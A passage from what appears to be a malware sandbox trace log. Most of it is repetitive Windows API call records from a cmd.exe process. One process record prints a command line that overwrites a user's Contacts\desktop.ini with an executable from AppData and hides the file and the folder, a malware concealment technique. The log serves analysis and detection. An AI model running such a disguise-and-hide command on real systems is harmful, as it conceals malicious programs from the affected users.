hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.078] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, 
lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, 
lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.079] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, 
lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.080] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.080] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0218.080] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] 
GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.081] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.081] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | 
out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, 
lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.146] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) 
returned 1 [0218.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.147] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.148] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x32, lpOverlapped=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] GetFileType (hFile=0x4c) returned 0x1 [0218.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] GetFileType (hFile=0x4c) returned 0x1 [0218.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x32, 
lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x32, lpOverlapped=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.148] _close (_FileHandle=4) returned 0 [0218.148] FindNextFileW (in: hFindFile=0x3a0e50, lpFindFileData=0x24eea4 | out: lpFindFileData=0x24eea4) returned 0 [0218.149] GetLastError () returned 0x12 [0218.149] FindClose (in: hFindFile=0x3a0e50 | out: hFindFile=0x3a0e50) returned 1 [0218.149] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0218.149] _close (_FileHandle=3) returned 0 [0218.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.149] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.150] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.150] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.150] SetConsoleInputExeNameW () returned 0x1 [0218.150] GetConsoleOutputCP () returned 0x1b5 [0218.150] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.150] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.150] exit (_Code=0) Process: id = "561" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xe3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32509 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32510 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32511 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32512 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32513 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32514 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32515 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32516 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = 
